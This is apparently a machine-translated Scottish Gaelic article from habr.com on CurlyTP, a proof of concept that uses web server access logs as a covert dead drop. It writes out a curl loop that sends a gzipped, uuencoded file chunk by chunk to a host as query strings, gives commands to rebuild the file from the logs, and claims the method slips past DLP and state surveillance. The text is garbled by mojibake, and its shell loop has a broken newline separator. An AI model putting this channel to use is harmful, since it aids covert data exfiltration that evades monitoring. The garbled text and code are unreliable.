A rèir mĂŹneachadh Wikipedia, tha tuiteam marbh na inneal co-fheall a bhios a âdèanamh iomlaid air fiosrachadh no cuid de nithean eadar daoine aâ cleachdadh Ă ite dĂŹomhair. Is e am beachd nach bi daoine aâ coinneachadh - ach bidh iad fhathast ag iomlaid fiosrachaidh gus sĂ bhailteachd obrachaidh a chumail suas.
Cha bu chòir don Ă ite falaich aire a tharraing. Mar sin, anns an t-saoghal far-loidhne bidh iad gu tric aâ cleachdadh rudan falaichte: breige sgaoilte sa bhalla, leabhar leabharlainn, no lag ann an craobh.
Tha mòran innealan crioptachaidh agus gun urra air an eadar-lĂŹn, ach tha an fhĂŹrinn mu bhith aâ cleachdadh nan innealan sin aâ tarraing aire. A bharrachd air an sin, faodaidh iad a bhith air am bacadh aig ĂŹre corporra no riaghaltais. Dè a nĂŹ thu?
Mhol an leasaiche Ryan Flowers roghainn inntinneach - . Ma smaoinicheas tu mu dheidhinn, dè a bhios frithealaiche lĂŹn aâ dèanamh? Aâ faighinn iarrtasan, aâ cur a-mach faidhlichean agus aâ sgrĂŹobhadh logaichean. Agus bidh e aâ clĂ radh gach iarrtas, eadhon feadhainn ceĂ rr!
Tha e a 'tionndadh a-mach gu bheil frithealaiche lÏn sam bith a' leigeil leat cha mhòr teachdaireachd sam bith a shà bhaladh sa log. Bha flÚraichean a 'faighneachd ciamar a chleachdar seo.
Tha e aâ tabhann an roghainn seo:
- Gabh faidhle teacsa (teachdaireachd dĂŹomhair) agus obraich a-mach an hash (md5sum).
- Bidh sinn ga chòdachadh (gzip + uuencode).
- Bidh sinn aâ sgrĂŹobhadh chun loga aâ cleachdadh iarrtas a tha ceĂ rr a dhâaona ghnothach chun an fhrithealaiche.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shGus faidhle a leughadh, feumaidh tu na h-obraichean sin a dhèanamh ann an òrdugh cÚil: dÏ-chòdachadh agus unzip am faidhle, thoir sÚil air an hash (faodar an hash a ghluasad gu sà bhailte thairis air seanalan fosgailte).
Tha Ă iteachan air an cur nan Ă ite =+=gus nach bi beĂ rnan anns an t-seòladh. Bidh am prògram, ris an can an t-Ăšghdar CurlyTP, aâ cleachdadh còdachadh base64, leithid ceanglachan post-d. Tha an t-iarrtas air a dhèanamh le prĂŹomh fhacal ?transfer?gus am faigh an neach a gheibh e gu furasta e anns na logaichean.
Dè a chÏ sinn anns na clà ran sa chÚis seo?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"Mar a chaidh ainmeachadh roimhe, gus teachdaireachd dhÏomhair fhaighinn feumaidh tu na h-obraichean a choileanadh ann an òrdugh cÚil:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gTha am pròiseas furasta a dhèanamh fèin-ghluasadach. Tha md5sum aâ maidseadh, agus tha susbaint an fhaidhle aâ dearbhadh gun deach a h-uile cĂ il a chòdachadh gu ceart.
Tha an dòigh-obrach gu math sĂŹmplidh. âIs e adhbhar na h-eacarsaich seo dĂŹreach dearbhadh gun gabh faidhlichean a ghluasad tro iarrtasan lĂŹn beaga neo-chiontach, agus bidh e ag obair air frithealaiche lĂŹn sam bith le logaichean teacsa sĂŹmplidh. Gu bunaiteach, tha a h-uile frithealaiche lĂŹn na Ă ite falaich! â sgrĂŹobh Flowers.
Gu dearbh, chan obraich an dòigh ach ma tha cothrom aig an neach a gheibh e air logaichean frithealaiche. Ach tha an leithid de ruigsinneachd air a thoirt seachad, mar eisimpleir, le mòran de luchd-aoigheachd.
Ciamar a chleachdadh?
Tha Ryan Flowers ag rĂ dh nach e eòlaiche tèarainteachd fiosrachaidh a thâ ann agus nach cuir e ri chèile liosta de chleachdaidhean a dhâ fhaodadh a bhith ann airson CurlyTP. Dha, tha e dĂŹreach na dhearbhadh air bun-bheachd gum faodar na h-innealan eòlach a chĂŹ sinn a h-uile latha a chleachdadh ann an dòigh neo-ghnĂ thach.
Gu dearbh, tha grunn bhuannachdan aig an dòigh seo thairis air âfalaichâ frithealaiche eile mar no : chan fheum e rèiteachadh sònraichte air taobh an fhrithealaiche no protocolaidhean sònraichte sam bith - agus cha tog e amharas am measg an fheadhainn a bhios aâ cumail sĂšil air an trafaic. Chan eil e coltach gun dèan siostam SORM no DLP sganadh URLan airson faidhlichean teacsa teann.
Is e seo aon de na dòighean air teachdaireachdan a chuir tro fhaidhlichean seirbheis. Faodaidh tu cuimhneachadh mar a bâ Ă bhaist do chuid de chompanaidhean adhartach a bhith aâ suidheachadh no ann an còd duilleagan HTML.

Bâ e am beachd nach biodh ach luchd-leasachaidh lĂŹn aâ faicinn an ugh CĂ isge seo, leis nach biodh neach Ă bhaisteach aâ coimhead air cinn-cinn no còd HTML.
Source: www.habr.com
